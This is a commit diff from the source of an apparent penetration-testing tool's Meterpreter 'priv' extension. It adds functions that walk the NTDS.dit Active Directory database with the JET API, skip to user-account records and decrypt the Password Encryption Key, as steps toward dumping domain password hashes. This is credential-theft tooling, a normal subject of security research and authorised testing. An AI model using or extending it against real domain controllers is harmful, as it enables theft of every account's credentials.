move to the first user record

move through the datatable until we find
the first sam user object.

MSP-12356

c/meterpreter/source/extensions/priv/server/ntds.c

@@ -67,13 +67,29 @@ DWORD ntds_parse(Remote *remote, Packet *packet){
 	memset(pekEncrypted, 0, sizeof(encryptedPEK));
 	memset(pekDecrypted, 0, sizeof(decryptedPEK));
 
+	// Get and Decrypt the Password Encryption Key (PEK)
 	pekStatus = get_PEK(ntdsState, accountColumns, pekEncrypted);
 	if (pekStatus != JET_errSuccess){
 		res = pekStatus;
+		engine_shutdown(ntdsState);
 		goto out;
 	}
 	if (!decrypt_PEK(sysKey, pekEncrypted, pekDecrypted)){
 		res = GetLastError();
+		engine_shutdown(ntdsState);
+		goto out;
+	}
+	// Set our Cursor on the first User record
+	JET_ERR cursorStatus = find_first(ntdsState);
+	if (cursorStatus != JET_errSuccess){
+		res = cursorStatus;
+		engine_shutdown(ntdsState);
+		goto out;
+	}
+	cursorStatus = next_user(ntdsState, accountColumns);
+	if (cursorStatus != JET_errSuccess){
+		res = cursorStatus;
+		engine_shutdown(ntdsState);
 		goto out;
 	}
 

c/meterpreter/source/extensions/priv/server/ntds_jet.c

@@ -43,6 +43,12 @@ JET_ERR engine_startup(jetState *ntdsState){
 	return JET_errSuccess;
 }
 
+JET_ERR find_first(jetState *ntdsState){
+	JET_ERR cursorStatus;
+	cursorStatus = JetMove(ntdsState->jetSession, ntdsState->jetTable, JET_MoveFirst, (JET_GRBIT)NULL);
+	return cursorStatus;
+}
+
 JET_ERR get_column_info(jetState *ntdsState, ntdsColumns *accountColumns){
 	JET_ERR columnError;
 	const char attributeNames[][25] = {
@@ -109,6 +115,32 @@ JET_ERR get_PEK(jetState *ntdsState, ntdsColumns *accountColumns, encryptedPEK *
 	return readStatus;
 }
 
+JET_ERR next_user(jetState *ntdsState, ntdsColumns *accountColumns){
+	JET_ERR cursorStatus;
+	JET_ERR readStatus;
+	JET_ERR finalStatus = JET_errSuccess;
+	DWORD accountType = 0;
+	unsigned long columnSize = 0;
+	do{
+		cursorStatus = JetMove(ntdsState->jetSession, ntdsState->jetTable, JET_MoveNext, (JET_GRBIT)NULL);
+		if (cursorStatus != JET_errSuccess){
+			finalStatus = cursorStatus;
+			break;
+		}
+		//Retrieve the account type for this row
+		readStatus = JetRetrieveColumn(ntdsState->jetSession, ntdsState->jetTable, accountColumns->accountType.columnid, &accountType, sizeof(accountType), &columnSize, 0, NULL);
+		// Unless this is a User Account, then we skip it
+		if (readStatus == JET_wrnColumnNull){
+			continue;
+		}
+		else if (readStatus != JET_errSuccess){
+			finalStatus = readStatus;
+			break;
+		}
+	} while (accountType != 0x30000000);
+	return finalStatus;
+}
+
 JET_ERR open_database(jetState *ntdsState){
 	JET_ERR attachStatus = JetAttachDatabase(ntdsState->jetSession, ntdsState->ntdsPath, JET_bitDbReadOnly);
 	if (attachStatus != JET_errSuccess){

c/meterpreter/source/extensions/priv/server/ntds_jet.h

@@ -63,8 +63,10 @@ typedef struct{
 
 JET_ERR engine_shutdown(jetState *ntdsState);
 JET_ERR engine_startup(jetState *ntdsState);
+JET_ERR find_first(jetState *ntdsState);
 JET_ERR get_column_info(jetState *ntdsState, ntdsColumns *accountColumns);
 JET_ERR get_PEK(jetState *ntdsState, ntdsColumns *accountColumns, encryptedPEK *pekEncrypted);
+JET_ERR next_user(jetState *ntdsState, ntdsColumns *accountColumns);
 JET_ERR open_database(jetState *ntdsState);
 JET_ERR read_table(jetState *ntdsState, ntdsColumns *accountColumns, decryptedPEK *pekDecrypted);